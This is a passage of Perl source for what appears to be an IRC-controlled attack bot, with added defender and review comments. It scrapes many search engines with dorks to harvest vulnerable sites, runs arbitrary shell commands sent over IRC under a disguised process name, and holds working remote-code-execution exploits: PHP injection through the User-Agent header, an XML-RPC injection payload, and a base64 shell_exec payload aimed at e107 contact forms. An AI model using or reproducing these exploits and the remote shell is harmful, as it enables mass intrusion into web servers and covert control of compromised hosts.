- if ($engine eq "JacKAT") { my @jackat = &jack3($dork."+site:at"); push(@total,@jackat); }
- if ($engine eq "JacKAU") { my @jackau = &jack4($dork."+site:au"); push(@total,@jackau); }
- if ($engine eq "JacKBR") { my @jackbr = &jack5($dork."+site:br"); push(@total,@jackbr); }
- if ($engine eq "JacKCA") { my @jackca = &jack1($dork."+site:ca"); push(@total,@jackca); }
- if ($engine eq "JacKCL") { my @jackcl = &jack2($dork."+site:cl"); push(@total,@jackcl); }
- if ($engine eq "JacKCN") { my @jackcn = &jack3($dork."+site:cn"); push(@total,@jackcn); }
- if ($engine eq "JacKCoM") { my @jackcom = &jack4($dork."+site:com"); push(@total,@jackcom); }
- if ($engine eq "JacKCZ") { my @jackcz = &jack5($dork."+site:cz"); push(@total,@jackcz); }
- if ($engine eq "JacKDE") { my @jackde = &jack1($dork."+site:de"); push(@total,@jackde); }
- if ($engine eq "JacKDK") { my @jackdk = &jack2($dork."+site:dk"); push(@total,@jackdk); }
- if ($engine eq "JacKES") { my @jackes = &jack3($dork."+site:es"); push(@total,@jackes); }
- if ($engine eq "JacKEU") { my @jackeu = &jack4($dork."+site:eu"); push(@total,@jackeu); }
- if ($engine eq "JacKFR") { my @jackfr = &jack5($dork."+site:fr"); push(@total,@jackfr); }
- if ($engine eq "JacKHU") { my @jackhu = &jack1($dork."+site:hu"); push(@total,@jackhu); }
- if ($engine eq "JacKID") { my @jackid = &jack2($dork."+site:id"); push(@total,@jackid); }
- if ($engine eq "JacKIL") { my @jackil = &jack3($dork."+site:il"); push(@total,@jackil); }
- if ($engine eq "JacKIN") { my @jackin = &jack4($dork."+site:in"); push(@total,@jackin); }
- if ($engine eq "JacKInfO") { my @jackinfo = &jack5($dork."+site:info"); push(@total,@jackinfo); }
- if ($engine eq "JacKIR") { my @jackir = &jack1($dork."+site:ir"); push(@total,@jackir); }
- if ($engine eq "JacKIT") { my @jackit = &jack2($dork."+site:it"); push(@total,@jackit); }
- if ($engine eq "JacKJP") { my @jackjp = &jack3($dork."+site:jp"); push(@total,@jackjp); }
- if ($engine eq "JacKKR") { my @jackkr = &jack4($dork."+site:kr"); push(@total,@jackkr); }
- if ($engine eq "JacKMX") { my @jackmx = &jack5($dork."+site:mx"); push(@total,@jackmx); }
- if ($engine eq "JacKMY") { my @jackmy = &jack1($dork."+site:my"); push(@total,@jackmy); }
- if ($engine eq "JacKNeT") { my @jacknet = &jack2($dork."+site:net"); push(@total,@jacknet); }
- if ($engine eq "JacKNL") { my @jacknl = &jack3($dork."+site:nl"); push(@total,@jacknl); }
- if ($engine eq "JacKOrG") { my @jackorg = &jack4($dork."+site:org"); push(@total,@jackorg); }
- if ($engine eq "JacKPH") { my @jackph = &jack5($dork."+site:ph"); push(@total,@jackph); }
- if ($engine eq "JacKPL") { my @jackpl = &jack1($dork."+site:pl"); push(@total,@jackpl); }
- if ($engine eq "JacKRO") { my @jackro = &jack2($dork."+site:ro"); push(@total,@jackro); }
- if ($engine eq "JacKRU") { my @jackru = &jack3($dork."+site:ru"); push(@total,@jackru); }
- if ($engine eq "JacKTH") { my @jackth = &jack4($dork."+site:th"); push(@total,@jackth); }
- if ($engine eq "JacKUA") { my @jackua = &jack5($dork."+site:ua"); push(@total,@jackua); }
- if ($engine eq "JacKUK") { my @jackuk = &jack1($dork."+site:uk"); push(@total,@jackuk); }
- if ($engine eq "JacKUS") { my @jackus = &jack2($dork."+site:us"); push(@total,@jackus); }
- if ($engine eq "JacKSI") { my @jacksi = &jack3($dork."+site:si"); push(@total,@jacksi); }
- if ($engine eq "JacKBE") { my @jackbe = &jack4($dork."+site:be"); push(@total,@jackbe); }
- if ($engine eq "JacKBIZ") { my @jackbiz = &jack5($dork."+site:biz"); push(@total,@jackbiz); } # Defender note: each of these queries is the same dork plus a "+site:<tld>" suffix, a recognisable pattern in proxy or egress logs
- }
- if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); } # this backend is not gated by $gps or $gps2
- if ($gps2 == 1) { # $gps2 is 1 at the top of the file; it gates the remaining engines
- if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
- if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
- if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
- if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
- if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
- if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); }
- if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); }
- if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
- if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
- if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
- if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
- if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam); }
- if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }
- }
- @clean = &clean(@total); # clean() collapses repeated slashes and removes duplicates
- if ($silentmode == 0) { # $silentmode is 1 at the top of the file, so the counts are not announced unless that is changed
- &msg("$chan","$logo $engine <=> Total: [".scalar(@total)."] Clean: [".scalar(@clean)."] "); }
- return @clean; # an unrecognised $engine value leaves @total empty, so the result is an empty list
- }
- ##################################################################################
- sub isFound() { # Fetches $_[0] and returns 1 if the response body matches the pattern in $_[1], otherwise 0.
- my $status = 0;
- my $link = $_[0]; # URL handed to get_content()
- my $reqexp = $_[1]; # used below as a regular expression, not as a literal string
- my $res = &get_content($link);
- if ($res =~ /$reqexp/) { $status = 1 } # the pattern is interpolated unescaped, so metacharacters in it are live
- return $status;
- }
- sub get_content() { # Issues one HTTP GET for $_[0] through LWP::UserAgent and returns the response body.
- my $url = $_[0];
- my $ua = LWP::UserAgent->new(agent => $uagent); # $uagent is set outside this view
- $ua->timeout($timot); # $timot is 10 at the top of the file
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- return $res->content; # the status code is never checked, so error-page bodies are returned as well
- }
- ######################################### SEARCH ENGINE
- sub jack1() { # Pages through the search endpoint whose base URL is in $jack1 (set outside this view) and returns candidate URLs for the query in $_[0].
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100){ # offsets 0..1000 in steps of 100: eleven requests per call
- my $search = ($jack1.uri_escape($key)."&num=100&start=".$i); # the query is percent-encoded before being appended
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { # captures the target of each "/url?q=http://..." result link
- my $link = $1;
- if ($link !~ /google/){ # skips any hit whose URL contains "google"
- my @grep = &links($link); # links() returns three variants of each hit
- push(@list,@grep);
- }
- }
- }
- return @list; # not de-duplicated here
- }
- sub jack2() { # Same paging loop as jack1, but against the base URL held in $jack2 (set outside this view).
- my @list;
- my $key = $_[0]; # search string
- for (my $i=0; $i<=1000; $i+=100){ # result offsets 0, 100, ... 1000
- my $search = ($jack2.uri_escape($key)."&num=100&start=".$i);
- my $res = &search_engine_query($search); # raw response text, headers included
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { # one iteration per "/url?q=http://..." link in the page
- my $link = $1;
- if ($link !~ /google/){ # drops links containing "google"
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub jack3() { # Same paging loop as jack1, but against the base URL held in $jack3 (set outside this view).
- my @list;
- my $key = $_[0]; # search string
- for (my $i=0; $i<=1000; $i+=100){ # result offsets 0, 100, ... 1000
- my $search = ($jack3.uri_escape($key)."&num=100&start=".$i);
- my $res = &search_engine_query($search); # raw response text, headers included
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { # one iteration per "/url?q=http://..." link in the page
- my $link = $1;
- if ($link !~ /google/){ # drops links containing "google"
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub jack4() { # Same paging loop as jack1, but against the base URL held in $jack4 (set outside this view).
- my @list;
- my $key = $_[0]; # search string
- for (my $i=0; $i<=1000; $i+=100){ # result offsets 0, 100, ... 1000
- my $search = ($jack4.uri_escape($key)."&num=100&start=".$i);
- my $res = &search_engine_query($search); # raw response text, headers included
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { # one iteration per "/url?q=http://..." link in the page
- my $link = $1;
- if ($link !~ /google/){ # drops links containing "google"
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub jack5() { # Same paging loop as jack1, but against the base URL held in $jack5 (set outside this view).
- my @list;
- my $key = $_[0]; # search string
- for (my $i=0; $i<=1000; $i+=100){ # result offsets 0, 100, ... 1000
- my $search = ($jack5.uri_escape($key)."&num=100&start=".$i);
- my $res = &search_engine_query($search); # raw response text, headers included
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { # one iteration per "/url?q=http://..." link in the page
- my $link = $1;
- if ($link !~ /google/){ # drops links containing "google"
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub google() { # Queries www.google.com for $_[0] in pages of 100 and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=100){ # eleven requests per call, offsets 0..1000
- my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i); # plain http, filter=0 added to the query string
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { # only http:// targets are captured
- my $link = $1;
- if ($link !~ /google/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list; # Defender note: bursts of num=100 paged queries from one client are the observable side of this loop
- }
- sub walla() { # Queries search.walla.co.il for $_[0], pages 0..100, and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=100; $b+=1) { # the counter is the package variable $b (no "my" in this sub)
- my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=text&page=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) { # captures href targets that are followed by a title attribute
- my $link = $1;
- if ($link !~ /walla\.co\.il/){ # skips the engine's own links
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub yahoo(){ # Queries search.yahoo.com for $_[0] and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=1000; $b+=10) { # offsets 1, 11, ... 991; $b is the package variable (no "my")
- my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/http\%3a\/\/(.+?)\"/g) { # matches targets written with a percent-encoded colon ("http%3a//")
- my $link = $1;
- if ($link !~ /yahoo\.com/){ # skips the engine's own links
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub ask() { # Queries uk.ask.com for $_[0] and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=1000; $i+=100) { # page values 1, 101, ... 901
- my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss="); # the qid value is hard-coded, so it repeats in every request
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { # captures href targets followed by an onmousedown attribute
- my $link = $1;
- if ($link !~ /ask\.com/){ # skips the engine's own links
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub onet() { # Queries szukaj.onet.pl for $_[0] and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- my $b = 0; # lexical counter; overwritten by the loop initialiser below
- for ($b=1; $b<=400; $b+=10) { # the counter is placed in the URL path, 1, 11, ... 391
- my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key));
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) { # captures anchors whose href is the last attribute
- my $link = $1;
- if ($link !~ /onet|webcache|query/){ # skips the engine's own, cached and query links
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub clusty() { # Queries search.yippy.com (clusty project) for $_[0] and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- my $b = 0; # lexical counter; overwritten by the loop initialiser below
- for ($b=10; $b<=200; $b+=10) {
- my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&");
- my $res = &search_engine_query($search);
- if ($res !~ /next/) {$b=100;} # NOTE(review): the loop bound is 200, so setting 100 does not end the loop and can move the counter backwards
- while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
- my $link = $1;
- if ($1 !~ /yippy\.com/){ # tests $1, which still holds the same text as $link here
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub bing() { # Queries www.bing.com for $_[0] and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=400; $i+=10) { # "first" offsets 1, 11, ... 391
- my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { # the opening quote of the href is optional in this pattern
- my $link = $1;
- if ($link !~ /google/) { # the filter string is "google", so links on bing.com itself are not excluded
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub sapo(){ # Queries pesquisa.sapo.pt for $_[0], pages 1..50, and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=50; $b+=1) { # the counter is the package variable $b (no "my" in this sub)
- my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local");
- my $res = &search_engine_query($search);
- if ($res !~ m/Next/i) {$b=50;} # no "Next" text: the current page is still parsed, then the loop ends
- while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
- my $link = $1;
- if ($1 !~ /\.sapo\.pt/){ # tests $1, which still holds the same text as $link here
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub lycos() { # Queries search.lycos.com for $_[0], pages 0..50, and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=50; $b+=1) { # the counter is the package variable $b (no "my" in this sub)
- my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/title=\"http:\/\/(.*?)\"/g) { # reads the URL from title attributes rather than href
- my $link = $1;
- if ($link !~ /lycos\.com/){ # skips the engine's own links
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub uol() { # Queries busca.uol.com.br for $_[0] and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=1000; $b+=10) { # the counter is the package variable $b (no "my" in this sub)
- my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($key)."&start=".$b);
- my $res = &search_engine_query($search);
- if ($res =~ m/retornou nenhum resultado/i) {$b=500;} # NOTE(review): the loop bound is 1000, so setting 500 does not end the loop and can move the counter backwards
- while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
- my $link = $1;
- if ($link !~ /uol\.com\.br|\/web/i){ # skips the engine's own links and any URL containing "/web"
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub seznam() { # Queries search.seznam.cz for $_[0] and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=300; $b+=20) { # "from" offsets 1, 21, ... 281; $b is the package variable (no "my")
- my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20&from=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { # the opening quote of the href is optional in this pattern
- my $link = $1;
- if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){ # skips these four domains
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub hotbot() { # Queries www.hotbot.com for $_[0], pages 0..50, and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=50; $b+=1) { # the counter is the package variable $b (no "my" in this sub)
- my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key));
- my $res = &search_engine_query($search);
- if ($res =~ m/had no web result/i) {$b=50;} # on the "no result" text the current page is still parsed, then the loop ends
- while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) { # captures href targets that are followed by a title attribute
- my $link = $1;
- if ($link !~ /hotbot\.com/){ # skips the engine's own links
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub aol() { # Queries search.aol.com for $_[0] and returns the extracted result URLs.
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=300; $b+=10) { # "page" values 0, 10, ... 300; $b is the package variable (no "my")
- my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.*?)\"/g) { # captures every quoted http:// href in the response
- my $link = $1;
- if ($link !~ /aol\.com/){ # skips the engine's own links
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub biglobe { # Queries cgi.search.biglobe.ne.jp for $_[0] and returns the extracted result URLs.
- my $key = $_[0];
- my @list;
- for ($b=1; $b<=500; $b+=10) { # "start" offsets 1, 11, ... 491; $b is the package variable (no "my")
- $num += $num; # NOTE(review): $num is not declared or initialised in this sub; doubling an unset value stays 0 - confirm against the rest of the file
- my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all";
- my $res = &search_engine_query($search);
- while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) {
- my $link = $1;
- if ($link !~ /biglobe/){ # skips the engine's own links
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- #########################################
- sub clean() {
-     # Collapses every run of slashes to a single "/" in each argument, then
-     # returns the arguments in first-seen order with duplicates removed.
-     # The substitution edits the caller's values in place, because the
-     # elements of @_ are aliases.
-     my %seen;
-     my @unique;
-     for my $item (@_) {
-         $item =~ s{/+}{/}g;
-         push @unique, $item unless $seen{$item}++;
-     }
-     return @unique;
- }
- sub links() {
-     # Expands one "host/path" string into three slash-terminated variants and
-     # returns them in the order (full link, host only, parent directory).
-     my $target = $_[0];
-     (my $parent = $target) =~ s{(.*)/[^/]*$}{$1};          # drop the last path segment
-     (my $server = $target) =~ s{([-a-zA-Z0-9.]+)/.*}{$1};  # keep the leading host part
-     my @variants;
-     for my $form ($target, $server, $parent) {
-         my $entry = $form . "/";
-         $entry =~ s{//}{/}g;                               # fold doubled slashes
-         push @variants, $entry;
-     }
-     return @variants;
- }
- sub search_engine_query() { # Sends a hand-built HTTP/1.0 GET for $_[0] over a raw TCP socket and returns the whole response as one string.
- my $url = $_[0];
- $url =~ s/http:\/\///; # strips the first "http://" from the URL
- my $host = $url;
- my $query = $url;
- my $page = ""; # stays empty if the socket block below fails
- $host =~ s/href=\"?http:\/\///;
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; # keeps the text before the first "/" as the host name
- $query =~ s/$host//; # $host is used as an unescaped pattern here, so its dots match any character
- if ($query eq "") { $query = "/"; }
- eval { # "or return" on the next line leaves only this eval block, so a failed connect yields ""
- my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return; # always port 80, no TLS
- my $sget = "GET $query HTTP/1.0\r\n";
- $sget .= "Host: $host\r\n";
- $sget .= "Accept: */*\r\n";
- $sget .= "User-Agent: $uagent\r\n"; # $uagent is set outside this view
- $sget .= "Connetion: Close\r\n\r\n"; # Defender note: the header name is misspelled and sent as written, which makes it a usable network signature
- print $sock $sget;
- my @pages = <$sock>; # reads until the server closes the connection; no read timeout is set here
- $page = "@pages"; # lines are joined with the list separator; status line and headers are included
- close($sock);
- };
- return $page; # $@ is not inspected, so errors are silent
- }
- #########################################
- sub shell() { # Executes the command text in $_[1] on the local host and relays its output to the IRC target in $_[0].
- my $path = $_[0]; # IRC target that receives the output lines
- my $cmd = $_[1]; # command text; no validation or allow-list is applied anywhere in this sub
- if ($cmd =~ /cd (.*)/) {
- chdir("$1") || &msg("$path","No such file or directory"); # "cd" is done in-process, so the new directory applies to later commands
- return;
- }
- elsif ($pid = fork) { waitpid($pid, 0); } # parent: reaps the first child, which exits right after forking again
- else { if (fork) { exit; } else { # double fork: the command runs in a grandchild, detached from the main process
- my @output = `$cmd 2>&1 3>&1`; # $cmd is handed to the system shell unmodified; stderr and fd 3 are merged into the captured output
- my $c = 0;
- foreach my $output (@output) {
- $c++;
- chop $output; # removes the last character of the line (normally the newline)
- &msg("$path","$output");
- if ($c == 5) { $c = 0; sleep 3; } # pauses 3 seconds after every 5 lines sent
- }
- exit;
- }}
- } # Defender note: on a host running this script the visible effect is a perl process spawning shell children; the file header sets $fakeproc to "/usr/sbin/httpd", presumably to disguise the process name (the assignment is not in this view)
- sub isAdmin() {
-     # Returns 1 when the nickname in $_[0] is string-equal to $admin, else 0.
-     # The nickname is the only thing compared: no hostmask, ident or password
-     # is checked in this sub.
-     my $nick = $_[0];
-     return ($nick eq $admin) ? 1 : 0;
- }
- sub msg() { # Sends a PRIVMSG with text $_[1] to target $_[0] on the current IRC socket.
- return unless $#_ == 1; # requires exactly two arguments; anything else is silently ignored
- sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]"); # sendraw and $IRC_cur_socket are defined outside this view
- }
- sub nick() { # Builds an IRC NICK command for the nickname in $_[0] and hands it to sendraw.
- return unless $#_ == 0; # requires exactly one argument
- sendraw("NICK $_[0]"); # NOTE(review): msg() passes $IRC_cur_socket first; no socket is passed here - confirm against sendraw's definition
- }
- sub notice() { # Builds an IRC NOTICE with text $_[1] for target $_[0] and hands it to sendraw.
- return unless $#_ == 1; # requires exactly two arguments
- sendraw("NOTICE $_[0] :$_[1]"); # NOTE(review): msg() passes $IRC_cur_socket first; no socket is passed here - confirm against sendraw's definition
- }
- sub cmdlfi() { # Requests $_[0] with a User-Agent header that embeds the command in $_[1], then reports any output found in the response to the IRC target in $_[2].
- my $browser = LWP::UserAgent->new;
- my $url = $_[0];
- my $cmd = $_[1];
- my $chan = $_[2];
- my $hie = "lobex<?system(\"$cmd 2> /dev/stdout\"); ?>byroe"; # PHP snippet wrapping $cmd between the literal markers "lobex" and "byroe"
- $browser->agent("$hie"); # the snippet is sent as the User-Agent header. Defender note: a User-Agent containing "<?" or these markers in access logs is a strong indicator of this request
- $browser->timeout(7);
- $response = $browser->get( $url ); # $response has no "my", so it is a package variable
- if ($response->content =~ /lobex(.*)byroe/s) { # /s lets the capture span several lines
- &msg("$chan","$lfilogo ".$1." ");
- } else {
- &msg("$chan","$lfilogo No Output "); # also reached when the request fails; the status code is not checked
- }
- }
- sub cmdxml() { # POSTs an XML-RPC methodCall that embeds the command in $_[1] to the URL in $_[0], then reports any output found in the response to the IRC target in $_[2].
- my $jed = $_[0]; # target URL
- my $dwa = $_[1]; # command text, concatenated into the body unescaped
- my $chan = $_[2];
- my $userAgent = LWP::UserAgent->new(agent => 'perl post'); # fixed User-Agent string
- $exploit = "<?xml version=\"1.0\"?><methodCall>"; # $exploit has no "my", so it is a package variable
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>"; # output is framed by the literal markers "bamby" and "solo"
- my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit); # Defender note: text/xml POST bodies containing these markers, or the 'perl post' agent, are log indicators for this request
- if ($response->content =~ /bamby(.*)solo/s) { # /s lets the capture span several lines
- &msg("$chan","$xmllogo $1 ");
- } else {
- &msg("$chan","$xmllogo No Output "); # also reached when the request fails; the status code is not checked
- }
- }
- sub cmde107() {
- my $path = $_[0];
- my $code = $_[1];
- my $chan = $_[2];
- my $codecmd = encode_base64($code);
- my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));';
- my $req = HTTP::Request->new(POST => $path);
- $req->content_type('application/x-www-form-urlencoded');
- $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(7);
- my $res = $ua->request($req);
- my $data = $res->as_string;
- if ( $data =~ /ByroeNet(.*)/ ){
- $mydata = $1;
- &msg("$chan","(E107) $mydata ");
- }
- else { &msg("$chan","(E107) No Output "); }